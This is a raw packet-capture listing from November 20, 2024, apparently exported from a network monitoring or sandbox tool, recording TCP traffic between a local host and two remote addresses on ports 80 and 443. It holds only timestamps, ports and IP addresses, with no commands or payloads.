                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.518964052 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.518970013 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.518996000 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519010067 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519010067 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519013882 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519026995 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519042015 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519058943 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519073009 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519076109 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519089937 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519104004 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519141912 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519772053 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519788027 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519803047 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519849062 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.519890070 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520109892 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520127058 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520154953 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520170927 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520174980 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520188093 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520203114 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520207882 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520224094 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520239115 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520255089 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520270109 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520282984 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520282984 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520286083 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520303965 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520318985 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520334005 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520342112 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520342112 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520418882 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520803928 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520821095 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520837069 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520853043 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520853996 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520876884 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520927906 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520927906 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520961046 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520977020 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.520991087 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521007061 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521014929 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521023035 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521039963 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521039963 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521054983 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521102905 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521102905 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521194935 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521209002 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521258116 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521259069 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521276951 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521300077 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521300077 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521322012 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521661043 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521723032 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521730900 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521748066 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521765947 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521780968 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521790028 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521790028 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521797895 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521814108 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521819115 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521837950 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521850109 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521863937 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521879911 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521893024 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521907091 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521924019 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521939039 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521950006 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521950006 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.521955013 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522011042 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522011042 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522013903 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522028923 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522046089 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522063017 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522066116 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522078991 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522095919 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522100925 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522111893 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522139072 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522155046 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522167921 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522167921 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522171021 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522188902 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522218943 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522310972 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522932053 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522944927 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522960901 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.522988081 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523003101 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523005962 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523005962 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523020029 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523080111 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523080111 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523113966 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523128986 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523175955 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.523175955 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.541912079 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.541928053 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.541944981 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542021990 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542037964 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542054892 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542071104 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542117119 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542174101 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542368889 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542386055 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542402029 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542418003 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542435884 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542442083 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542452097 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542535067 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542537928 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542537928 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542562008 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542587996 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542604923 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542608023 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542620897 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542632103 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542632103 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542637110 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542653084 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542660952 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542675972 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542690992 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542701006 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542701006 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542707920 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542725086 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542741060 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542757988 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542758942 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542773962 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542779922 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542794943 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542813063 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542829990 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542829990 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542829990 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542846918 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542870998 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542886972 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542923927 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542923927 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.542979002 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.544399023 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.545425892 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.545443058 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.546103954 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.546113014 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550240040 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550256014 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550271988 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550297022 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550313950 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550328016 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550344944 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550353050 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550359964 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550436974 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550436974 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.550683022 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.551316977 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.551392078 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.551907063 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.551922083 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605693102 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605720043 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605735064 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605751038 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605770111 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605784893 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605802059 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605817080 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605865955 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605878115 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605904102 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605921984 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605935097 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605937004 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605953932 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605968952 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605993032 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605993032 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.605994940 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606036901 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606791973 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606861115 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606874943 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606889963 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606895924 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606921911 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606923103 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606937885 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606950998 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606956005 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606972933 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.606988907 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607008934 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607014894 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607028008 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607031107 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607044935 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607062101 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607076883 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607091904 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607094049 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607094049 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607119083 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607130051 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607184887 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607184887 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607490063 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607503891 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607522011 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607547998 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607552052 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607563019 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607579947 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607618093 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607618093 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607652903 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607671976 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607697010 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607712984 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607728958 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607733011 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607733011 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607764006 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607780933 CET8049742185.215.113.206192.168.2.6
